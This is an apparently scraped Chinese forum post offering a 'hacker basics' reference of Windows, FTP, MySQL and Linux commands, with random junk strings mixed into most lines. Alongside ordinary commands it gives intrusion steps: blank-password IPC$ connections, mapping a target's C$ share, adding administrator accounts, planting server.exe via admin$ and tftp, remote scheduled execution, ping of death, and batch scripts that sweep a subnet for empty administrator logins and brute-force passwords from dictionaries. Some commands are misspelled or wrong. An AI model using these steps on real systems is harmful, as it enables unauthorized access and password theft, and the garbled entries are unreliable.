黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 8 \* ~5 n7 n  O8 v. K8 W
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
5 w6 Y8 K0 _) B" C! t6 Wnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
# L) h: d! q( S3 F, h5 ~# Anet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:   L# N* K$ l( K1 ?7 \* t% e/ `! A& U
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 - t# n  d& d/ y3 H+ O7 n
net use h: /del 删除映射对方到本地的为H:的映射
  k' `8 W. O$ Z% e/ X0 Enet user 用户名　密码　/add 建立用户 ' J  b" }$ w6 d4 i
net user guest /active:yes 激活guest用户
+ P0 w* P* ?6 D3 u5 Qnet user 查看有哪些用户
/ g2 L  k; z6 ~0 u; i- fnet user 帐户名 查看帐户的属性 8 K: g( K8 C$ q6 M! s
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 # |6 T' ^+ ~2 ?/ a: S+ A) ^4 g
net start 查看开启了哪些服务
! t/ n, C2 n- z5 K0 Rnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
6 m; w1 U, H5 v; p6 Jnet stop 服务名 停止某服务 + s0 Y4 d+ A' \/ |2 g
net time \\目标ip 查看对方时间
# J2 n9 q: O5 ]- P  p1 @0 t0 Lnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 1 U  a  O5 p; X& Q' q
net view 查看本地局域网内开启了哪些共享 9 u' `. w) h! V- @' C
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
! t/ `* d+ U! k! anet config 显示系统网络设置 " z% D7 q8 P9 f% K& {4 w# w
net logoff 断开连接的共享
, l) p# V. y  S$ Wnet pause 服务名 暂停某服务 " S5 j+ L4 B9 V) r
net send ip "文本信息" 向对方发信息
6 U7 I* }( |6 s& Z$ |+ snet ver 局域网内正在使用的网络连接类型和信息
2 l) k! E* Q% a4 _net share 查看本地开启的共享 , w. ]( H6 D8 q  R3 ?+ m) j
net share ipc$ 开启ipc$共享 ' G/ i3 E- N! R! ^# Y! b' D# M
net share ipc$ /del 删除ipc$共享
9 _$ z3 v; S# |, S  {net share c$ /del 删除C：共享 & r; S$ Y8 B# s/ O. `8 X
net user guest 12345 用guest用户登陆后用将密码改为12345 . E! E" R2 B0 |5 d1 |& ]7 I9 [
net password 密码 更改系统登陆密码
) p/ N( ]6 W( r, Mnetstat -a 查看开启了哪些端口,常用netstat -an
. d" M0 B$ B8 j9 W  c+ g# mnetstat -n 查看端口的网络连接情况，常用netstat -an
2 {5 P! w+ e( [# Snetstat -v 查看正在进行的工作
  F: w% }# `( B% c- Bnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
  |" D+ A* O" [. \% @/ Znetstat -s 查看正在使用的所有协议使用情况 : T$ I: Q* x+ m: Z
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 0 t8 y4 z5 S% I% w
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 , d- Q: g7 }; Q5 Y+ c
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。   w* }  Z: j4 C# Q
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) . T4 T* `' K1 g: b  M
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 3 @+ v- C3 ], z! l) v% T: k4 O
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
+ k5 ~8 Y' K$ i! s: I. Y/ _kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
  h# x3 y  V0 B* u4 i) U) Udel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
7 R5 F; B5 r. j% {9 ^" q9 Qdel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
! h0 q# o3 M$ u1 C* n7 [$ mmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 4 B6 Y4 f' L# D2 {. @; p1 V) I8 q
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
6 U/ A1 B; k6 X4 R* kat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
& O* X$ r  C' J! l6 ~* bat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
4 Q* D+ Y2 V0 Q7 tat id号 /delete 停止某个已注册的计划任务
/ E% Q) J( i1 Y9 }9 Yat 查看所有的计划任务
& ]8 ?2 ~2 W% Zat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 * ~1 |2 ]5 G4 T% X
finger username @host 查看最近有哪些用户登陆
! ]9 E/ L% n0 `+ f! _& r1 Ytelnet ip 端口 远和登陆服务器,默认端口为23 ( h3 `1 k3 _0 Y; g
open ip 连接到IP（属telnet登陆后的命令）
0 l  j3 @' \! e; `6 Ytelnet 在本机上直接键入telnet 将进入本机的telnet 8 d1 M8 k' b' Z3 |9 }$ x! G
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
3 m% H$ t2 Q8 ]( x$ Bcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
5 Y3 B9 y, ?$ Q/ S5 W( u$ ccppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
# p" [* m+ h$ g, ]3 e9 Mcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： # g5 Z8 B, f+ n2 n0 J0 W, z
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 - y9 A4 N4 u9 K# f- t
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 " ?2 Y- x6 H* z
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 8 D" j6 X0 F' j
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) $ C  g, g, r8 i, \8 O
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface 9 D  F% i* v8 A
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 - [; H8 p- p- p1 q( a3 S  t( f0 r
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
, F2 P  \" U0 _' y3 s7 Wmem 查看cpu使用情况
& t0 }5 T' q; n3 Z, U8 b7 Aattrib 文件名(目录名) 查看某文件（目录）的属性
0 U: r) g7 M- a$ L. h, R/ D1 Fattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 4 A/ T* U5 k( N9 p0 H& |0 B
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 8 h& @4 b& P9 H7 ]- @! t2 X) \
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 - Z4 O+ s9 z& D5 w% e8 B/ E
set 指定环境变量名称=要指派给变量的字符 设置环境变量 2 ]# `# B& F- u  d2 i/ M! g% F8 \
set 显示当前所有的环境变量 2 p5 m4 j# l3 z8 p; a
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 & v; y: |0 H2 q& C0 M3 l9 k
pause 暂停批处理程序，并显示出：请按任意键继续.... / r- @, X& M  K1 m5 g% S% ?5 n
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
7 X/ A& R! l" Zgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
" D) s( ^  c, n! p4 g; ^+ o. A/ pcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
. u7 |/ U5 P4 w& p9 ]5 S5 _for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） ! F+ j  s# s* T& N" _6 x
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
" H9 T  {( `* V% U, c1 mecho 信息 在屏幕上显示出信息 3 f; B7 x. A% `- L0 L2 r4 O. m3 S
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中   ]0 \% f$ x6 P- C0 ?) S
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
6 [5 D2 h5 L: jfind 文件名 查找某文件 $ P( i9 t6 `6 k
title 标题名字 更改CMD窗口标题名字 , Z, Q; @+ `- U  }
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
$ e5 s3 f" m# Yprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) ) `% N3 w# u! _6 `+ O
print 文件名 打印文本文件
4 V) |. F  F. @+ G6 `7 tver 在DOS窗口下显示版本信息 , K8 m4 _6 P' p
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
# v, Y) E2 y* nformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
! D6 b/ o! S, J# A* jmd　目录名 创建目录
) O4 Y/ ^1 ?, H5 K( ]/ n( `* sreplace 源文件　要替换文件的目录 替换文件 ! C+ J6 @% Z7 N# Q
ren 原文件名　新文件名 重命名文件名 , D. m5 W+ B- g7 P* a# W
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
% I8 M, ^/ E- R6 i$ i" a/ V2 w. W0 n9 }type 文件名 显示文本文件的内容 / j7 ^8 F3 l+ ?; _; b
more 文件名 逐屏显示输出文件
7 V6 a7 @. Y$ q' f" vdoskey 要锁定的命令＝字符
# l2 W8 j% A2 k1 pdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
; ~4 g+ ?& z" u$ L: Ataskmgr 调出任务管理器 2 ?6 m8 n# i; P
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 6 `; u! T# y- M+ Y
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 0 O5 ]- {/ T$ o
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe 3 k* o6 w1 Y, o" x  X+ y
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
0 h& K# Y# \; _9 z, ccmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
& V, E) y- Z0 H- R  dregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
3 b& O6 ?. P  R" kregedit /e 注册表文件名 导出注册表
' l" Q* A! z6 |# ncacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 7 O9 z7 k. p0 `9 D/ J. E2 D  M
cacls 文件名 查看文件的访问用户权限列表
: N: }" W& v6 p% [REM 文本内容 在批处理文件中添加注解
8 J  z. d% v8 Znetsh 查看或更改本地网络配置情况
9 Q0 e- \8 K; r0 V: QIIS服务命令：
. M6 p5 a, h! L7 Q: Z$ tiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
% c7 h; d& o5 Tiisreset /start或stop 启动（停止）所有Internet服务
# K; M" l( p4 r7 }) q# uiisreset /restart 停止然后重新启动所有Internet服务
, t4 B$ @% O. T$ N3 c/ O' Eiisreset /status 显示所有Internet服务状态 % s! W- p" v" J/ B2 M$ Y
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 7 L* U0 J) b$ q3 ]
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 . D$ C) x. O( ?  a& Q; X& i* F' N
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 9 k, M/ J8 |" \) D2 [( Y- B2 b
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
% u8 n6 o5 P3 _+ }' jFTP 命令： (后面有详细说明内容)
7 C+ ~( E  o+ t* u3 {ftp的命令行格式为:
1 E7 L- J4 r1 `9 y  l6 Gftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
- @2 L/ v8 \& l$ a  e－d 使用调试方式。 + g9 U: x5 m* b" ]) i3 M$ y, ]. O
－n 限制ftp的自动登录,即不使用.netrc文件。9 X/ z3 s% S% P; p
－g 取消全局文件名。 ( z/ J/ q5 B  O! b- N2 h2 K0 {
help [命令] 或 ？[命令] 查看命令说明 & s6 _; q  ]  ?$ e3 M# P- E& b
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
& x& Q  d0 i1 t6 @5 A' jpwd 列出当前远端主机目录 + I$ p1 |& R! x& p
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中   ], _5 F7 g5 O, X$ _: ^
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 0 v& R. g" `$ b( n
mget [remote-files] 从远端主机接收一批文件至本地主机 # L( P: r& ?- W4 j) O
mput local-files 将本地主机中一批文件传送至远端主机
* @, u) R/ b5 g* E7 S1 y, udir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 1 k; Q8 D% i/ z
ascii 设定以ASCII方式传送文件(缺省值) ' e* K9 O  |0 J" u7 Q& t" ~
bin 或 image 设定以二进制方式传送文件
8 G0 {/ N  m3 e0 I+ s/ {bell 每完成一次文件传送,报警提示
& d6 d  [% T+ Z( b: w1 M" dcdup 返回上一级目录 - B) Z" ?7 h8 u9 l  T
close 中断与远程服务器的ftp会话(与open对应) - S) `- V8 n* }- D2 n) w' C
open host[port] 建立指定ftp服务器连接,可指定连接端口 0 h, v3 k0 a9 Y& |
delete 删除远端主机中的文件
9 a# R7 j" W9 lmdelete [remote-files] 删除一批文件 2 ]% L6 E; I% n5 D4 N
mkdir directory-name 在远端主机中建立目录
( F5 D; k. m' n0 e$ z. t8 irename [from] [to] 改变远端主机中的文件名
" \& e& f2 M+ E7 n5 X6 x5 }: a* b( n2 Brmdir directory-name 删除远端主机中的目录 ) A% \) i) t3 }/ ~
status 显示当前FTP的状态
: e, c) m. X+ e8 m" ?, \system 显示远端主机系统类型
, S" r; {7 D" n1 _; |( U0 Suser user-name [password] [account] 重新以别的用户名登录远端主机
7 F/ H" @% l: T6 ropen host [port] 重新建立一个新的连接 0 m5 |. U8 S0 Y( a. Z7 z
prompt 交互提示模式
$ S# Q( \  @2 E0 t, U" C! T! hmacdef 定义宏命令 2 Z5 G# r. B1 Q/ c; ~
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 5 c/ B& g% T5 \* A  Y& J% }
chmod 改变远端主机的文件权限
0 q6 t4 X: l/ F2 hcase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 5 e. H) d6 X" ~2 p
cd remote－dir 进入远程主机目录
7 \6 _* u0 F$ l; Y$ ]% d+ Ucdup 进入远程主机目录的父目录 $ [1 n& k" S) [% c
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip 9 K# ^; |1 i1 n) j5 h
MYSQL 命令： * l$ x# y; b0 S8 O( j" d
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
$ }2 P9 C; _8 e. z0 W（例：mysql -h110.110.110.110 -Uroot -P123456
4 l7 @0 _/ t3 B$ Y  c4 ]8 F注:u与root可以不用加空格，其它也一样）
1 e/ M  Q' D8 L/ x4 L7 R8 s, Lexit 退出MYSQL
/ n3 U' K% Z( ]4 n* R1 [- l& Qmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 1 ~& B1 M* U3 y* j, x
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 7 u9 q! M* G' L
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 . f* U7 U9 A9 }0 E$ p/ B/ Q
use mysql；# @1 g4 w! p1 O7 u  L
show tables; 显示库中的数据表 $ _/ J! I7 L) n
describe 表名; 显示数据表的结构
# d  c. c) Z/ Q* @8 q3 b" ?/ [create database 库名; 建库
1 {% Z- E# v% n& p8 }) l. _use 库名；
5 V; O0 |" S/ J, s8 A4 g: L" }create table 表名 (字段设定列表)； 建表 6 C; Q& X# }. d
drop database 库名;
. H( _( z" v3 n9 F& d( p% T. @drop table 表名； 删库和删表 ! B1 b& a* E& w: w! S2 @/ Q$ {
delete from 表名; 将表中记录清空
3 a, D% u9 P" f3 F5 i5 K2 Tselect * from 表名; 显示表中的记录
. m+ k% U$ P+ Xmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 5 K  }6 ]! |7 [0 t! Q! Y
win2003系统下新增命令（实用部份）：
: J9 T1 p* Y: g* qshutdown /参数 关闭或重启本地或远程主机。5 R% C& H, n# t# ?
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
& c# e. A1 k) r' Q" H  d2 `& c# g例：shutdown /r /t 0 立即重启本地主机（无延时）
( u% T, N2 m7 l$ mtaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
' G" x6 z- E) ~. s: O! q参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 6 W, k+ H# x  i. I# t
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。% D! I+ _6 u8 r/ R9 s
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程7 _- U2 h3 ^1 i6 P
Linux系统下基本命令： 要区分大小写- g1 c; F* e2 Q* L2 d# Q
uname 显示版本信息（同win2K的 ver） ! `2 b+ k$ A" X- }, S; m; w
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） * m0 `/ ~: B. k% L" }' y* r
pwd 查询当前所在的目录位置 ' y) j4 [# G) T
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 - L; i+ n+ |  _( F5 p+ L
cat 文件名 查看文件内容
' y) R% g  F9 D' Z4 e3 icat >abc.txt 往abc.txt文件中写上内容。 * g, ?0 [6 L$ ]+ s9 F
more 文件名 以一页一页的方式显示一个文本文件。   X. g5 B6 d5 M. L# y( N
cp 复制文件
) k8 c, A2 C- e, X- Y1 j( I/ fmv 移动文件 2 _7 G& S0 [8 j" O
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
6 n( i% ]0 F! J2 {2 ^0 f) z- smkdir 目录名 建立目录
/ j! C8 j$ i9 K" H# A, Hrmdir 删除子目录，目录内没有文档。
: X; e, p; m# F" Hchmod 设定档案或目录的存取权限 3 s; L- B  U2 I8 s9 c/ c: Z/ R9 u* g
grep 在档案中查找字符串
/ {+ l5 q6 N, I+ odiff 档案文件比较
: F- z4 f) I# s9 ifind 档案搜寻 ) I7 F& ~. C) B6 t# x% l+ k9 L
date 现在的日期、时间 ! }3 E  P3 E7 o$ ?1 E' n, M
who 查询目前和你使用同一台机器的人以及Login时间地点 ) r, j9 E- v3 L
w 查询目前上机者的详细资料 - E: O( Y2 J8 A) ^3 \. N2 o( B
whoami 查看自己的帐号名称 , q/ b  e' ?6 P, q7 u' D( i$ |
groups 查看某人的Group
* p: g5 O2 \' K$ g: F: i+ @passwd 更改密码 . c. i; `& y5 O+ s! S: D! \
history 查看自己下过的命令 * x0 ~" o3 Z1 B, P
ps 显示进程状态 / I# k) m: H3 h5 O6 x) H
kill 停止某进程
8 _0 j! t* T: tgcc 黑客通常用它来编译C语言写的文件 8 V( R  w% z; M! m# E7 X
su 权限转换为指定使用者 3 U- i# |7 T9 T! J$ d, G
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
# f( u" Y. x& rftp ftp连接上某服务器（同win2K
5 w1 t8 c/ ~4 D6 U2 Q附：批处理命令与变量
3 j9 l; i! [2 z1：for命令及变量 基本格式：
9 R  @4 y- f! j2 O4 vFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。6 K6 C4 ~  z& s6 X
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
- ?! V: K# b' j- a8 `) _! I; ?(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
8 r5 [0 o2 n* e8 C: k& o9 Tcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
$ f3 h& U+ s" P& j0 ?' u$ _7 O" vcommand_parameters：为特定命令指定参数或命令行开关
. z( ?; n* }' k8 ~0 J& PIN (set)：指在(set)中取值；DO command ：指执行command
" e3 m# S1 {' @1 R; {, G: u/ w参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 $ a. r7 o' P* C: n" a( l* ~
用法举例：
  l2 s) b/ j: j" `@echo off
4 T: p" Q& O6 \0 J1 wecho 用法格式：test.bat *.*.* > test.txt
: R! v2 J, `. Q! |, f, e3 h5 v- ?for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt & W; p9 _3 `5 H- W2 s. U/ X0 c
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。7 c: g& _+ B9 O9 [, \. M- Z. Y
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
  T- J) n8 {8 N) M" C@echo off
1 b% `6 R: y* X& becho 用法格式：ok.bat ip % s. ]: i% a/ i) o
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 & J* m+ b, w1 I7 @
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
7 Z/ Y' i& ]( J( u' @( G2：if命令及变量 基本格式：
& f% o7 m  p! x. A* `IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。% n8 b8 h  i# P
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。% q. K, ?1 h0 C: T! ~5 t' k
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 1 v2 i9 s% F3 Z- |
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。* h: [; n( M4 r: z9 i: m. o0 q/ Q& Y
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） % V$ r, c/ _" C' n' X; T
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。6 W8 {8 \. t1 g5 p6 }9 H3 l
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
% m1 R& H8 O& E+ N, K5 |IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”